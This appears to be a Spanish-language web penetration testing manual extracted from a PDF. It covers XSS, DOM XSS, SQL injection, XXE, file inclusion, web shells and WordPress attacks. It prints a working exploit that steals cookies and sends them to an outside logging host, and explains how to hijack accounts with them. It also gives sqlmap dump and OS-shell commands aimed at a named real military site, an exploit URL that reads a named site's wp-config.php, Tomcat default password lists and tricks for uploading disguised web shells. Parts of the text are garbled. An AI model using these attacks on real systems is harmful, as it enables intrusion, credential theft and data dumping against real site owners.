Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Web Pen Testing PDF
Web Pen Testing PDF
idioma: español
-- nivel 2 --
identificando errores en paginas java
identificando errores en paginas php
identificando errores en paginas ruby - Rails
identificando errores en paginas django
identificando errores en paginas asp
identificando errores mysql
identificando errores sqlserver error
identificando errores sql injection
identificando errores sql error
-- nivel 3 --
Code Injection
Command Injection
Cross domain policy audit
format string inject
header inject
http trace
integer overflow inject
local file include
remote file include
shell injection
sql arithmetic injection
sql text injection
sql timing injection
url injection
xpath injection
xss injection
Que es web pentesting: El web pentesting es muy bien pagado por empresas y
personas que adquieren un servicio entre ello se realiza una auditoría luego se
realiza un informe detallado con las principales bases dentro de un reporte de
seguridad donde debe llevar “Gráficos” “Mitigación Del Problema” “Dar Consejos
Para Evitar El Fallo De Seguridad” “Resumir Y Describir Las Vulnerabilidades”
“describir que tan grave es el problema”.
Durante el web pentesting estas son las vulnerabilidades que según la gráfica nos
dice que son las que más se presentarán durante la auditoría web una que otras
veces otras vulnerabilidades pequeñas que no requieren explotación pueden ser
directorios no expuestos pero mediante un método automatizado podrían dejar
claro donde se encuentren estas bases de datos .sql en el anterior manual de bug
bounty program de kelvinsecurity se dio a conocer como ganar dinero realizando
estas investigaciones y auditoría para ganar dinero trabajando realizando el
trabajo de white hat ahora vamos a automatizar algunas prácticas y auditar de
forma mucho mas rapida.
Básica estructura web:
Existen muchos tipos de diseños que se realizan algunos que solo son informativos
pero extrañamente no tienen buscadores una de las principales búsqueda de una
vulnerabilidad es por medio del buscador a sido tan efectivo que ha sido tomado
en cuenta por la comunidad de hacking a nivel mundial durante una auditoría es
corremendable por vulnerabilidades como es XSS durante el comienzo a diseñar
una plataforma web es integrado el HTML bajo funciones PHP y JavaScript.
Existen paginas informativas que no ocupan una base de datos es decir que
están por la unica razon de informar con contenido en html para lograr vulnerar
una página que solamente cuente con contenido informativo existen una amplia
búsqueda si este suele tener CPANEL, PHPMYADMIN o de otra forma si este cuenta
con una versión apache vulnerable sobre algún Exploit.
PhPMyAdmin ha sido explotado de igual manera por medio de sus versiones una de
ellas como Code Injection lo cual veremos en este manual PhPMyAdmin también se
le fue implementada ataques de fuerza bruta de igual manera CPanel ha sido
afectada de igual manera para identificar un servidor con PhPMyAdmin O CPanel
tomar en cuenta los siguientes ejemplos.
PhPMyAdmin: www.mivictima.com/phpmyadmin
CPanel: www.victima.com:2082
www.ejemplo.com/register.php
www.ejemplo.com/newsletter.php
Script ingresado para identificar vulnerabilidad:
<img%20src='aaa'%20onerror=alert(1)>
<b onmouseover=alert('HackedBySecTeam')>Alerta!</b>
<script>alert("TEST");</script>
- ejemplo
Herramientas como BruteXSS cuentan con un Wordlist para realizar intentos con
script javascript con la esperanza de encontrar un XSS Stored, Cross Site Scripting
u otro.
de manera GET o POST podemos realizarlo pero para ello comienza el test de
manera automatizada en hackbar {Enable Post Data} y con BRUTEXSS existe la
manera automatizada de seleccionar por ejemplo {GET} {POST}
Test XSS:
- Wordlist XSS
XSTE: Para aquellos que no están familiarizados con Content Spoofing, es una
falla similar a Cross-Site Scripting (XSS) donde una carga útil se coloca en una
entrada controlada por el usuario que es reflejada de nuevo al usuario por la
aplicación, sino que inyecta cargas útiles de script.
El atacante inyecta una carga útil que desfigura la página. En muchos casos, las
fallas de Spoofing de contenido resultan de defectos XSS que han sido mitigados
por la prevención exclusiva de la inyección de scripts. Los ataques de spoofing de
contenido suelen usarse conjuntamente con la ingeniería social porque se dirigen a
la confianza de un usuario del dominio asociado con la aplicación vulnerable..
Digamos que te encuentras con una página web que se parece a algo así.
/ TEST
Cuando veo algo como esto, inmediatamente pienso XSS. La página ha reflejado
claramente algo que controlamos de nuevo a nosotros.
Payload:
https://172.21.9.71:8000/<script>alert(42)</script>
Resultados:
En este caso, la codificación de salida HTML se utilizó para mitigar XSS. Esta es una
manera esencialmente a prueba de errores para evitar XSS y donde la mayoría de
los probadores se mueven junto con la prueba. Pero todavía hay peligro aquí. Es
posible que no podamos inyectar una carga XSS, pero ¿qué nos impide utilizar el
conjunto de caracteres disponibles para crear una carga útil que admita un ataque
de ingeniería social.
PAYLOAD:
- resultado
- Hemos tomado una vulnerabilidad XSS aparentemente mitigada y hemos
falsificado contenido significativo para explotarlo más, usando esta página
en un intento de explotar la confianza de una víctima en el dominio
asociado. Con suerte, se autentican en nuestro proxy malicioso y nos
proporcionarán sus credenciales de dominio.
Es peligroso porque enviamos cargas desde el cliente y esto significa que podemos
pasar por alto la mayoría del lado del servidor Protecciones. El DOM basado XSS
fue introducido por primera vez por Amit Klein en julio de 2005.2 Y después de
estos años debido A la complejidad de encontrar y explotar todavía un montón de
sitios web son vulnerables a ella.
<script>
function hashbased()
{
var l = location.hash.slice(1);
eval(l); // execute injected code
}
hashbased();
Así que el guión está buscando una porción de hash y luego evalarla (¿eh?), Así que
inyecto el carácter '#' y Entonces código JS, y debe ejecutarse fácilmente. Aquí hay
una captura de pantalla de mi hackmyweb (no publicado) en este Tipo de
vulnerabilidad.
Así que inyectando #alert (0) aparecerá una alerta .si quieres saber más búsqueda
y puedes encontrar un montón de Artículos interesantes sobre este tema.
Paso I: pasos para encontrar vulnerabilidad Para encontrar las vulnerabilidades
que necesita un objetivo y la selección de destino es clave muy importante en el
éxito Descubrimiento de vulnerabilidades. Así que sólo empezar a googlear para
encontrar algunos subdominios.
-JS Archivos
Entonces, ¿qué tipo de script debemos buscar? Cualquier script infame es un gran
objetivo para pasar tiempo en él. Asi que Después de un tiempo acabo de
encontrar un subdominio llamado tw.adspecs.yahoo.com que utiliza un JS lib
llamado Adspec_v1_5.js.
Así que cuando abra este archivo encontrará un archivo JS muy grande y si pasa
unos segundos Comprender este archivo contienen una gran cantidad de otros
archivos JS. Aquí hay algunos ejemplos:
yahoo-dom-event.js
connection-min.js
json-min.js
element-beta-min.js
datasource-beta-min.js
datatable-beta-min.js
utilities.js
yahoo-min.js
event-min.js
sessvars.js
menu.js
Un pequeño script que le permite usar variables de sesión de JavaScript sin usar
cookies. Le permitirá almacenar 2 MB de datos, con mucho menos problemas que
una solución basada en cookies.
toObject:function(x){
eval("this.myObj="+x);
if(!this.restoreCirculars || !alert){return this.myObj};
this.restoreCode=[];
this.make(this.myObj,true);
var r=this.restoreCode.join(";")+";";
eval('r=r.replace(/\\W([0-9]{1,})(\\W)/g,"[$1]$2").replace(/\\.\\;/g,";")');
eval(r);
return this.myObj
},
sessvars.js
toObject:function(x)
{
if(!this.cleaner)
{
try{this.cleaner=new RegExp('^("(\\\\.|[^"\\\\\\n\\r])*?"|[,:{}\\[\\]0-9.\\-+Eaeflnr-u
\\n\\r\\t])+?$')}
catch(a){this.cleaner=/^(true|false|null|\[.*\]|\{.*\}|".*"|\d+|\d+\.\d+)$/}
};
if(!this.cleaner.test(x)){return {}};
eval("this.myObj="+x);
if(!this.restoreCirculars || !alert){return this.myObj};
if(this.includeFunctions){
var x=this.myObj;
for(var i in x){if(typeof x[i]=="string" && !x[i].indexOf("JSONincludedFunc:")){
x[i]=x[i].substring(17);
eval("x[i]="+x[i])
}}
}
if(!this.cleaner)
{
try{this.cleaner=new RegExp('^("(\\\\.|[^"\\\\\\n\\r])*?"|[,:{}\\[\\]0-9.\\-+Eaeflnr-u
\\n\\r\\t])+?$')}
catch(a){this.cleaner=/^(true|false|null|\[.*\]|\{.*\}|".*"|\d+|\d+\.\d+)$/}
};
if(!this.cleaner.test(x)){return {}};
eval("this.myObj="+x); // vulnerable eval
Ahora si yahoo código tiene la falta de rutina de sanitización ¿cómo puedo activar
la vulnerabilidad? Y más Importante cómo puedo explotar el error? Voy a responder
a estas preguntas en unos pocos.
toObject:function(x){
eval("this.myObj="+x);
if(!this.restoreCirculars || !alert){return this.myObj};
this.restoreCode=[];
this.make(this.myObj,true);
var r=this.restoreCode.join(";")+";";
eval('r=r.replace(/\\W([0-9]{1,})(\\W)/g,"[$1]$2").replace(/\\.\\;/g,";")');
eval(r);
return this.myObj
}
<script>
window.open("http://tw.adspecs.yahoo.com/tc/index.php","alert('PWNED!!!'+do
cument.domain);", "", false);
</script>
Así que después de que corrió mi primer PoC y después de aceptar feo ventana
emergente me dieron un mensaje jugoso.
- Ejemplo
<a href="http://tw.adspecs.yahoo.com/tc/index.php"
target="alert(document.domain)">Click Here</a>
Así que mediante el uso de destino podemos cambiar la propiedad de nombre y de
nuevo podemos obtener la ejecución JS. Así que primero estaba pensando en usar
iframe con valor de nombre y falló debido a Cross-Frame-Scripting Protección en
los navegadores modernos.
¿Hay alguna otra manera? Estaba pensando en cambiar el valor de nombre y luego
hacer una redirección y funciona.
<script>
name='alert(document.domain)';
location.href='http://tw.adspecs.yahoo.com/tc/index.php';
</script>
¡Y Boom !!! Trabajo PoC sin ningún clic o pop-up que poner ~ 400 millones de
usuarios simplemente en riesgo y como Fuente de la ventana no es el carácter
restringido podemos escribir cualquier código stealer javascript que queremos.
No se aplica codificación.
Así que podemos inyectar fácilmente a nuestro ladrón para ello, así que escribí el
exploit final de la siguiente manera:
<html>
<script>
window.name=' new
Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.c
ookie);
setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);';
location.href="http://adspecs.yahoo.com/index.php";
</script>
</html>
Así que mi PC primero robó las cookies y luego usar setTimeout para terminar de
robar y luego redirigir a la víctima a Yahoo.com. Y aquí está Mario PoC
¿Así que robamos las galletas cómo las podemos usar? Es fácil y bien documentado
y se puede leer sobre él En el slick artículo.
Todo lo que necesitamos es T y Y parte de las cookies robadas, por lo que puede
acceder fácilmente con su propio correo Utilice cualquier editor de cookies que
desee cambiar su Y y T y actualizar el correo.
Identificando errores de páginas: los dorks ayudaron durante mucho tiempo a
buscar errores expuestos en servidores bajo programación PHP, ASP.NET, JAVA por
ello para un pentester memorizar un error e identificar el servidor observando
imágenes y realizando básicos test en páginas es necesario memorizar lo siguiente:
status/
admin/
web-console/
jmx-console/
admin-console/
manager/html
web-console/Invoker
jmx-console/HtmlAdaptor
invoker/JMXInvokerServlet
Lista de contraseñas predeterminadas comunes para las interfaces de
administración de Tomcat:
admin:
admin:Password1
admin:admin
admin:j5Brn9
admin:password
admin:password1
admin:tomcat
both:tomcat
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:
tomcat:Password1
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:tomcat
Para un usuario común no entendería lo que se intenta hacer en este caso y es que
existen ciertos paneles de administración de tomcat lo cual hemos dicho
jmx-console por ejemplo el cual las contraseñas predeterminadas por defecto sería
alguna de la lista que se encuentra arriba lo cual el pirata podría entrar con una de
esas contraseñas perjudicando al que la administra y no ha tomado medidas de
seguridad para proteger su seguridad.
Identificando errores de páginas PHP: Mientras que los scripts PHP no son
intrínsecamente malos, el usuario podría, ya sea inadvertidamente, escribir un
script que permite la Vulnerabilidad o crear maliciosamente un script para
aprovechar ciertas funciones de PHP. Un administrador web Puede que no tenga
que preocuparse por tales scripts para el sitio web principal que él ella maneja,
pero otros usuarios en el Sistema que crear y publicar contenido web podría crear
mal scripts PHP. El administrador del servidor web debe estar consciente de estos
problemas con PHP, por lo que ninguna de las páginas del sistema tiene
vulnerabilidades.
Hay varias formas diferentes de evitar esta amenaza. Una manera de aliviar esta
amenaza es Deshabilite el comando passthru. Otra forma de detener la amenaza es
desinfectar la entrada a la variable en una Similar a la que se hizo para la
vulnerabilidad local.
XSS Vulnerability
CSRF Vulnerability
Bypass Methods
- Listado De Exploits
Vulnerabilidades en Rails:
CSRF:
Ataques:
PoC:
http://www.myvictima.com/file_download/file=../config/database.yml
¿Que es django?
¿Que es ORM?
RESUMEN: Es una herramienta que te permite realizar Consultas SQL a la Base De
Datos.
http://website/publications_press.asp?id=[SQL]
http://website/press.asp?id=[SQL]
http://website/[path]/view_product.asp?ID=[SQL]
Conocidos como una vulnerabilidad SQL Injection lo cual existen en una gran escala
de páginas que trabajan con asp.net mas adelante trateremos de forma
automatizada procesar estas vulnerabirilidades por ahora identificamos los errores.
- Sitio Electoral de los estados unidos
existen herramientas que pueden auditar por nosotros esta tecnología lo cual
realiza la siguiente funciones:
- Escaneo Automatizado
1) buscar directorios
2) buscar contraseñas en ficheros sensibles “Dumpear”
Comandos:
sparty.py -e rpc_version_check -u www.mivictima.com
sparty_v_0.1.py -s layouts -u www.mienemigo.com
sparty_v_0.1.py -d dump -u www.mienemigo.com
sparty.py -l list -u www.mienemigo.com
sparty.py -v ms_frontpage -u www.mienemigo.com
sparty.py -v ms_sharepoint -u www.mienemigo.com
sparty.py -f pvt -u www.mienemigo.com
Busqueda mediante dorks:
en muchas paginas se conocen estos hechos y hoy en dia esta siendo utilizado por
muchs hackers del mundo.
las paginas involucradas son las paginas web shopping donde se suele pagar y
registrar numeros de tarjetas de credito y todos los datos como codigo de
seguridad para realizar compras en linea.
ASPX:
https://packetstormsecurity.com/files/137024/ASP-Webshell-For-IIS-8.html
PHP:
https://packetstormsecurity.com/files/137439/WSO-Shell-Variant-Using-A-404.ht
ml
Listado Completo:
https://github.com/tennc/webshell
Funciones de una web shell:
Las webshells son modificadas e integran nuevas funciones que puedes hacer con
los permisos desde el servidor donde esta se encuentra digamos que tenemos
1N73CTION Shell.
1N73CTION Shell tiene una barra de herramientas donde integran las siguientes
herramientas:
Subir una web shell es un trabajo de todos los dias del ranking de zone-h y que es
zone-h pues zone-h se encuentran los hacktivistas que se involucran en ataques
informaticos a servidores tan solo para dejar un mensaje de protesta o un simple
“Owned” es un ranking y por lo tanto subir una web shell es tan importante para
ello aunque no ganen dinero.
Shell.php.png
Shell.php.jpg
Los hacktivistas se las ven complicado con las áreas administrativas entre ellas
modulos de galería donde puedas subir solo “Fotografias” y donde intentas subir un
formato incorrecto y este te devuelve un error “Formato Incorrecto” entonces por
ello utilizamos los formatos de imágenes para engañar a la plataforma y subir
nuestra web shell.
Code Injection:
Code Injection involucra mucho lo que tiene que ver con SQL Injection a pesar que
nuestro manual involucra el comienzo de Code Injection y Despues SQL Injection
explicare paso a paso como funciona entre Code Injection - SQL Injection a
continuación.
se puede inyectar código dentro de una barra de comentarios este puede ejecutar
código malicioso en otro caso un formulario que permite ingresar código y
visualizarla entre estos javascript de un sitio externo y Inyección HTML conocido
como involucrar HTML con una función “Re Dirección” a un script PHP externo.
Herramientas:
SQLMAP HAVIJ
Consulta Vulnerabilidad:
sqlmap.py -u
http://www.aviacion.mil.ve:8080/admin/expediente/resumen1.php?cedula='
1 --dbs
Consultar DataBase:
sqlmap.py -u
http://www.aviacion.mil.ve:8080/admin/expediente/resumen1.php?cedula='
1 --D NombreDataBase --tables
sqlmap.py -u
http://www.aviacion.mil.ve:8080/admin/expediente/resumen1.php?cedula='
1 --D NombreDataBase -t usuarios --columns --dump
Dumpear Tabla:
sqlmap.py -u
http://www.aviacion.mil.ve:8080/admin/expediente/resumen1.php?cedula='
1 --dump-all
_se pueden subir ficheros mediante SQLMAP se ha demostrado que con SQLMAP
podríamos subir archivos que nos permitan subir nuestra web shell.
PHP
ASP
ASPX
JSP
TABLA DE COMANDOS ESPECIALES SQLMAP
# Enumerate tables
sqlmap --dbms=mysql -u
"http://www.mivictima.com/param1=value1¶m2=value2" --dbs -p param2
sqlmap --dbms=mysql -u
"http://www.mivictima.com/param1/value1*/param2/value2" --dbs
# Obtener OS Shell
# Consulta SQL
_ Mediante sqlmap subiremos la web shell ante todo ya una vez realizado la
inyección SQL y haber entrado a las bases de datos podremos aplicar el siguiente
método de SQLMAP utilizando OS Shell.
- Vulnerabirilidad ASP.NET
- integramos en los comandos sqlmap “--os-shell”
- Leyendo Fichero
$host="localhost"
$user="db"
$pass=""
$db=""
Inyectando Shell:
- Uploader
- Fortaleza Al Server
Bypass mod_Security:
Uso de los firewalls de aplicaciones web, realicé una investigación sobre todos
los Firewalls de aplicaciones web para comprobar su eficacia en la protección
contra secuencias de comandos entre sitios Ataques.
mediante el uso de “Tamper” las funciones que tiene vamos a realizar la inyección
SQL identifiquemos a “Mod_Security” a continuación:
(- Mod_Security -)
En un reporte Mathias Karlsson al pesar de no ser del top en bug bounty program
en hackerone llegó un reporte una vulnerabilidad “Blind SQL Injection” es afectado
el white hat primero intentó de manera manual hacer notar el error mediante la
inyección manual.
Parámetro Vulnerable:
http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&t
otal_entries=2&sort_by=id&order=asc&client=(Inyeccion)
Poc: El recurso en / reservations no desinfecta adecuadamente la variable "client"
antes de ponerla en una sentencia MySQL. Esto resulta en una vulnerabilidad de
Inyección SQL Ciega. Podemos demostrar la vulnerabilidad haciendo que el servidor
SQL espere un tiempo antes de responder.
http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&t
otal_entries=2&sort_by=id&order=asc&client='+or+benchmark(0,md5(1))=
Vulnerabilidad
SQL A CIEGAS: Ataque a ciegas por inyección SQL, en inglés, Blind SQL injection,
es una técnica de ataque que utiliza la inyección SQL. Se evidencia cuando en una
página web, por una falla de seguridad, no se muestran mensajes de error al no
producirse resultados correctos ante una consulta a la base de datos, mostrándose
siempre el mismo contenido es decir, solo hay respuesta si el resultado es
correcto.
sqlmap.py
--url="https://www.bookfresh.com/reservations?page=1&client=%27%20and%201
=1*)+limit+1%23" --technique="B" --dbms="mysql" --skip="page"
--cookie="PHPSESSID2=363dcc2095fa6a0a8b389e7b1389b3fe;" --sql-shell
- Por Último $ 1.500 USD. aunque este haya intentando subir una web shell
Time-based Blind SQL Injection:
_ Las técnicas basadas en tiempo se usan a menudo para lograr pruebas cuando
no hay otra forma de recuperar información del servidor de base de datos. Este
tipo de ataque inyecta un segmento SQL que contiene una función específica de
DBMS o consulta pesada que genera un retardo de tiempo. Dependiendo del tiempo
que se tarda en obtener la respuesta del servidor, es posible deducir algo de
información. Como se puede adivinar, este tipo de enfoque de inferencia es
particularmente útil para los ataques de inyección de SQL ciego y ciego profundo.
DBMS:
Función Spleep “Time” : Sólo disponible desde MySQL 5. Se tarda unos segundos
en el parámetro.
Una vez más, MySQL lo hace bastante fácil ya que proporciona una función IF (). El
siguiente ejemplo muestra cómo es posible combinar pruebas de inferencia con
técnicas basadas en el tiempo para verificar la versión de la base de datos
Resultados De Consulta TIME-BASED Ataque A Verificar La Versión De La Base De
Datos:
LDAP Injection:
Atacando LDAP:
Por lo tanto, estos consulta que se envía al supuesto LDAP tomada por las
aplicaciones de web y dárselo el problema es cuando no se filtra el contenido
(como siempre) que se da en el procesamiento de día y el reenvío cadena
ingresada Lo que no puede tener carbón severamente limitado y permitir la
entrada de determinadas consultas y más de la cual podemos obtener fácilmente
la información que debemos ser y así sucesivamente.
Clases De IP Durante Una Investigación:
- Tipo de clases De IP
Hacker: Después de una simple revisión, pensé Rapid7 ya debería haber conseguido
las vulnerabilidades más fácil. T ^ T y las vulnerabilidades que debían ser
desencadenada no eran fáciles de explotar. Por lo tanto tengo que mirar más
profundo!
- Cross-site scripting x 3
- Pre-Auth inyección SQL conduce a la ejecución remota de código
- Conocido de clave secreta conduce a la ejecución remota de código
- Elevación local de privilegios x 2
- El uso de pre-autenticación de SQL Injection escribir WebShell
En wordpress hay un mayor enfoque en los “Plugins” que utiliza esta CMS.
Wordpress ha sido explotado de muchas maneras y de manera automatizada desde
una terminal a continuación:
Existe plugins donde permiten subir “Imágenes - fotografías - banners” para
catalogarla en la página web basada en wordpress los hackers encuentran puntos
vulnerables donde estos hackers han podido subir de forma “Remota” una webshell
tan sencillo como el siguiente script.
Por lo general siempre cuando apliquemos este tipo de métodos bajo wordpress
sabremos que siempre la “Shell” se encontrará ubicada en wp-content uploads.
- Reporte
Paginas Vulnerables
“inurl:wp-content/plugins/scarcitybuilder/shortcode/index.php?edit=”
Como proteger wordpress:
- wp-config.php “Credenciales”
PoC:
wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Ejemplo: “El hacker puede solicitar una backdoor por POST mediante CuRL
que se envia mediante update_plugin” “Script”.
https://ambtec.com.ve/wp-admin/admin-ajax.php?action=revslider_show_imag
e&img=../wp-config.php
Proteccion Wordpress:
WAF Cloud Security debe cumplir su función lo cual evita los ataques informáticos
como ataques de denegación de servicios ejecuciones de exploits a tus servidores
protección de IPs entre otros productos se pueden elegir como “Incapsula, Sucuri o
CLoudflare”.
- Previene -
- LFI
- RFI
- XXE
- SQLi
- XSS
- DDoS - Web Scanners Down
WIKI: Es una parte de un sistema o una red que está diseñada para bloquear el
acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas.
Debilidades:
2 -El cortafuegos no puede proteger contra los ataques posibles a la red interna
por virus informáticos a través de archivos y software. La solución real está en que
la organización debe ser consciente en instalar software antivirus en cada máquina
para protegerse de los virus que llegan por cualquier medio de almacenamiento u
otra fuente.
Requerimientos:
PoC:
La DTD proporciona un mecanismo para definir entidades Cuyos valores pueden ser
sustituidos en el contenido del documento XML. Esto es útil cuando el El valor de la
entidad se utiliza varias veces.
El XML contiene un DTD con una entidad llamada "orientación" definida. El valor de
La entidad de "orientación" se establece en "alguna orientación". Después de la
DTD están los elementos XML Que contienen una etiqueta "url" y una etiqueta de
"orientación". El valor del elemento "orientación" es "& Orientation;" que es el
nombre de la entidad con un signo & (&) símbolo antes y un Punto y coma (;)
después. Esto instruye al analizador XML a reemplazar "& orientation;" con la
entidad Valor definido en el DTD, es decir, "alguna orientación".
Identificar vulnerabilidades XXE:
La respuesta directa a esta pregunta sería identificar los puntos finales que
acepten XML como entrada. Pero a veces se encontrará con los casos en los puntos
finales que acepten XML podrían no ser tan obvio por ejemplo, los casos en que el
cliente sólo utiliza JSON para acceder al servicio. Con estos casos, un probador de
la pluma tiene que probar cosas diferentes, tales como la modificación del
métodos HTTP, Content-Type etc, para ver cómo responde la solicitud. Si la
aplicación analiza el contenido, entonces hay una posibilidad de XXE.
1) denegación de servicio
2) Enumeración de Archivos
3) Enumeración de Redes
4) Escanear puertos
6) Lista de Directorios
7) Exfiltración de archivos
Impacto:
WSAP tiene variedades de ejemplos que pueden ser utilizados para tratar esas
O
vulnerabilidades que poco consigues en algunos sitios en primer lugar utilizamos un
único método de explotación Denominada XXE Injection.
<somexml><message>hola mundo</message></somexml>
- Estructura XML
Mediante PETICIÓN POST podemos ingresar lo siguiente que se denomina LFI File
Inclusion desde XXE Injecion.
<!DOCTYPE person [
<!ELEMENT person ANY>
<!ENTITY person "Mr Robot">
<somexml><message>Hello World</message></somexml>
<!DOCTYPE person [
<!ELEMENT person ANY>
<!ENTITY fileEntity SYSTEM "file:///ect/passwrd">">
<somexml><message>hola mundo</message></somexml>
Como Resultado:
“Explotación Exitosa”
Vbulletin Automatizando El Hacking:
Vbulletin ha sido víctima de ataques de todo tipo y muchas de sus versiones por
ello se ha creado herramientas capaz de auditar por nosotros de estos ataques es
que hoy en dia existen grandes fugas de datos.
Vulnerabilidades:
-VBSCAN
- Disclosure Config
- XSS
Abrimos:
http://forums.imore.com/includes/config.php~
Datos Obtenidos:
- Credenciales Administrativas
Subdomain TakeOver:
Recomendación:
Herramientas:
DnsDumpster:
https://dnsdumpster.com/
Sublist3r:
https://github.com/aboul3la/Sublist3r
Online Find:
https://pentest-tools.com/information-gathering/find-subdomains-of-domain
1. Es asombrosamente fácil firmar para arriba para una nueva cuenta y demandar
el Domain Name.
2. Al tener el dominio, un atacante puede crear un clon completo del sitio, agregar
un formulario de inicio de sesión que redirigirá al usuario a una determinada
página, robar credenciales valiosas como cuentas de administrador, robar cookies
o destruir completamente la credibilidad de su empresa. .
White Hat
“Los métodos web pentesting son utilizados para bien y el mal todo depende de
cada individuo que lo quiera usar a sus gustos o simplemente para trabajar de
whit hat en alguna empresa (Su Misión) prevenir un ataque ”
BlackHat
“Un hacker con propósitos maligno puede utilizar estas técnicas siempre y
cuando se enfoque en su objetivo y los niveles de dificultad del servidor
problemas de seguridad como LFI, XXE ,SubDomain TakeOver son de los pocos
que se fijan los soportes técnicas en paginas de medio trafico”